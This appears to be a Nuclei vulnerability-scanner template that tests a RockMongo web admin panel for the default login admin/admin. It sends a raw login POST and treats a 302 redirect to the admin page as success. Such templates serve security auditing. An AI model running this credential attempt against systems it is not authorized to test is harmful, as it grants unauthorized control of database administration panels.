id: rockmongo-default-login

info:
  name: Rockmongo Default Login
  author: pikpikcu
  severity: high
  tags: rockmongo,default-login

requests:
  - raw:
      - |
        POST /index.php?action=login.index HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Referer: {{Hostname}}/index.php?action=login.index

        more=0&host=0&username={{username}}&password={{password}}&db=&lang=en_us&expire=3

    payloads:
      username:
        - admin
      password:
        - admin
    attack: pitchfork

    matchers-condition: and
    matchers:

      - type: word
        words:
          - "Location: /index.php?action=admin.index&host=0"
          - "Set-Cookie: ROCK_LANG="
        part: header

      - type: status
        status:
          - 302
